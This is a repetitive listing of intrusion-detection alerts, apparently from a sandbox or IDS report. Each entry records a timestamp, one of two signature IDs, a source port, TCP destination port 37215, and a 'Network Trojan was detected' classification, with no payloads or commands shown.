              Timestamp:05/24/24-10:59:30.230966
              SID:2835222
              Source Port:54702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270742
              SID:2835222
              Source Port:58066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283510
              SID:2829579
              Source Port:53870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163453
              SID:2829579
              Source Port:56444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726529
              SID:2835222
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394659
              SID:2835222
              Source Port:40208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447880
              SID:2835222
              Source Port:50544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970660
              SID:2829579
              Source Port:41424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070331
              SID:2835222
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406366
              SID:2835222
              Source Port:51626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926427
              SID:2835222
              Source Port:50038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605744
              SID:2829579
              Source Port:38970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.105002
              SID:2835222
              Source Port:33256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164533
              SID:2829579
              Source Port:51264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538092
              SID:2829579
              Source Port:45262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363267
              SID:2829579
              Source Port:46422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099596
              SID:2835222
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539290
              SID:2829579
              Source Port:48878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055508
              SID:2829579
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432403
              SID:2835222
              Source Port:59642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991145
              SID:2829579
              Source Port:43924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165056
              SID:2829579
              Source Port:43822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432131
              SID:2829579
              Source Port:40026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147084
              SID:2829579
              Source Port:54646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868004
              SID:2835222
              Source Port:60830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100540
              SID:2829579
              Source Port:53038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639719
              SID:2829579
              Source Port:56500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495353
              SID:2829579
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637599
              SID:2829579
              Source Port:50864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598127
              SID:2829579
              Source Port:50218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462937
              SID:2829579
              Source Port:43028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420923
              SID:2835222
              Source Port:34814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553326
              SID:2835222
              Source Port:60238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625317
              SID:2835222
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246079
              SID:2829579
              Source Port:52904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400419
              SID:2829579
              Source Port:43574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490514
              SID:2829579
              Source Port:56966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188877
              SID:2829579
              Source Port:45268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232473
              SID:2829579
              Source Port:32978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396737
              SID:2835222
              Source Port:58840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444042
              SID:2835222
              Source Port:47140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570470
              SID:2835222
              Source Port:33484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621934
              SID:2835222
              Source Port:60398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.765033
              SID:2829579
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187577
              SID:2829579
              Source Port:45250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727291
              SID:2835222
              Source Port:49796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105527
              SID:2829579
              Source Port:60854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2835222
              Source Port:39502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923426
              SID:2829579
              Source Port:33336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972010
              SID:2829579
              Source Port:39000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978253
              SID:2829579
              Source Port:54556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535414
              SID:2829579
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802316
              SID:2835222
              Source Port:44758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487396
              SID:2835222
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433463
              SID:2829579
              Source Port:52860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186560
              SID:2829579
              Source Port:57914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164548
              SID:2829579
              Source Port:51502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663311
              SID:2835222
              Source Port:60884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044798
              SID:2835222
              Source Port:45482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334254
              SID:2835222
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547230
              SID:2829579
              Source Port:39666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368331
              SID:2829579
              Source Port:55298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631179
              SID:2829579
              Source Port:47700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568187
              SID:2835222
              Source Port:47040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484632
              SID:2835222
              Source Port:57996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078172
              SID:2835222
              Source Port:48310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833054
              SID:2829579
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624358
              SID:2835222
              Source Port:35996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118736
              SID:2835222
              Source Port:58538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764121
              SID:2829579
              Source Port:53940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103386
              SID:2829579
              Source Port:37330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327824
              SID:2835222
              Source Port:44514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493104
              SID:2829579
              Source Port:55636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661285
              SID:2829579
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623703
              SID:2829579
              Source Port:36776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161791
              SID:2829579
              Source Port:59620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234107
              SID:2835222
              Source Port:33432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048668
              SID:2829579
              Source Port:51768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429693
              SID:2829579
              Source Port:42584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394624
              SID:2835222
              Source Port:35210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538387
              SID:2835222
              Source Port:55432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607097
              SID:2829579
              Source Port:41576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697513
              SID:2835222
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837350
              SID:2835222
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098872
              SID:2829579
              Source Port:48586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483763
              SID:2835222
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456940
              SID:2829579
              Source Port:37348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992062
              SID:2835222
              Source Port:47970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459925
              SID:2829579
              Source Port:49296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332400
              SID:2835222
              Source Port:54092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880828
              SID:2829579
              Source Port:46008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726213
              SID:2835222
              Source Port:48332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303011
              SID:2835222
              Source Port:49268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920915
              SID:2835222
              Source Port:49394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926761
              SID:2829579
              Source Port:44008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802539
              SID:2835222
              Source Port:51560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926714
              SID:2835222
              Source Port:50084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994400
              SID:2829579
              Source Port:39184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061521
              SID:2829579
              Source Port:33734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396427
              SID:2835222
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444806
              SID:2835222
              Source Port:56766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623590
              SID:2829579
              Source Port:35454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725129
              SID:2829579
              Source Port:41154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761954
              SID:2835222
              Source Port:40164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425862
              SID:2829579
              Source Port:48772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233351
              SID:2835222
              Source Port:54612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129784
              SID:2835222
              Source Port:47018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884688
              SID:2835222
              Source Port:48228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457796
              SID:2829579
              Source Port:36346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551825
              SID:2835222
              Source Port:48562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269144
              SID:2835222
              Source Port:51696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879361
              SID:2829579
              Source Port:44560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186977
              SID:2835222
              Source Port:38238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280327
              SID:2835222
              Source Port:43188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108901
              SID:2835222
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313655
              SID:2829579
              Source Port:58494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536314
              SID:2829579
              Source Port:33440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638264
              SID:2835222
              Source Port:51540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365278
              SID:2829579
              Source Port:41520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917888
              SID:2829579
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926201
              SID:2829579
              Source Port:49792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432604
              SID:2829579
              Source Port:55830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493036
              SID:2829579
              Source Port:52528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070368
              SID:2835222
              Source Port:33498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483106
              SID:2835222
              Source Port:45240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268550
              SID:2835222
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109624
              SID:2829579
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152624
              SID:2835222
              Source Port:32960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623793
              SID:2829579
              Source Port:40112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821887
              SID:2829579
              Source Port:58772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433600
              SID:2829579
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395450
              SID:2829579
              Source Port:59782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281651
              SID:2835222
              Source Port:52072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402862
              SID:2829579
              Source Port:52938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552892
              SID:2829579
              Source Port:44030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250836
              SID:2835222
              Source Port:51990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643012
              SID:2829579
              Source Port:52088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.877869
              SID:2835222
              Source Port:33374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309230
              SID:2835222
              Source Port:49380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168015
              SID:2835222
              Source Port:49430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202488
              SID:2835222
              Source Port:40998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516555
              SID:2835222
              Source Port:37422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690168
              SID:2829579
              Source Port:41158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519467
              SID:2835222
              Source Port:34806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432595
              SID:2835222
              Source Port:47152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118972
              SID:2829579
              Source Port:54242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836217
              SID:2829579
              Source Port:39722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397408
              SID:2835222
              Source Port:42050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575264
              SID:2829579
              Source Port:56976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404480
              SID:2829579
              Source Port:56390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308584
              SID:2835222
              Source Port:43814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374143
              SID:2829579
              Source Port:44796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153034
              SID:2829579
              Source Port:39226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535096
              SID:2835222
              Source Port:58130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061402
              SID:2829579
              Source Port:52432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121383
              SID:2835222
              Source Port:46770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368799
              SID:2829579
              Source Port:60418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638063
              SID:2829579
              Source Port:45066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279949
              SID:2835222
              Source Port:49610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302940
              SID:2835222
              Source Port:60122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355047
              SID:2829579
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448027
              SID:2829579
              Source Port:49460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374501
              SID:2835222
              Source Port:38906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704281
              SID:2829579
              Source Port:34034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492468
              SID:2835222
              Source Port:44458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540595
              SID:2835222
              Source Port:33534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057205
              SID:2835222
              Source Port:59426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458364
              SID:2829579
              Source Port:55314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522275
              SID:2829579
              Source Port:55000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103679
              SID:2835222
              Source Port:36860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188352
              SID:2835222
              Source Port:51442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279587
              SID:2829579
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.427370
              SID:2829579
              Source Port:54978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333851
              SID:2829579
              Source Port:51368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118267
              SID:2829579
              Source Port:34282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493195
              SID:2829579
              Source Port:53660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965537
              SID:2829579
              Source Port:33560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543864
              SID:2835222
              Source Port:57328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623218
              SID:2829579
              Source Port:57602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823767
              SID:2835222
              Source Port:42252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480752
              SID:2835222
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530820
              SID:2829579
              Source Port:42154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549359
              SID:2829579
              Source Port:53416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631658
              SID:2835222
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727285
              SID:2829579
              Source Port:38446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.482976
              SID:2835222
              Source Port:57772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866432
              SID:2829579
              Source Port:51608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233906
              SID:2829579
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661259
              SID:2835222
              Source Port:36234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281009
              SID:2835222
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423401
              SID:2829579
              Source Port:54010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372007
              SID:2829579
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505401
              SID:2835222
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544126
              SID:2835222
              Source Port:52658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154770
              SID:2829579
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253993
              SID:2835222
              Source Port:33364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157705
              SID:2835222
              Source Port:56344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548481
